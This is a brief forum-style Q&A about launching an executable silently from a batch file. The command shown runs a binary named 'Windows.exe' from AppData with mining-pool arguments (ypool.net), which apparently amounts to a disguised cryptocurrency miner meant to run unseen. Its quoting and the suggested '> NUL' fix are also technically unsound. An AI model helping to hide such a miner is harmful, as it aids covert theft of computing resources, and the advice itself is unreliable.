# How can I run an exe file silently from a bat file?

Tags: batch-file, command-line, cmd

I tried to run an exe file from a bat file silently in the following way:

```
"C:\Users\Uran\AppData\Roaming\Windows.exe -o ypool.net -u sundaram.1 -p x -t 4" <Silent>
```

But it doesn't open the exe. If I remove `<Silent>` and apostrophes, it runs, but of course not silently. What is the correct way to run an exe silently?

Answer (score 3):

Try to use `> NUL` instead of `<Silent>`:

```
"C:\Users\Uran\AppData\Roaming\Windows.exe -o ypool.net -u sundaram.1 -p x -t 4" > NUL
```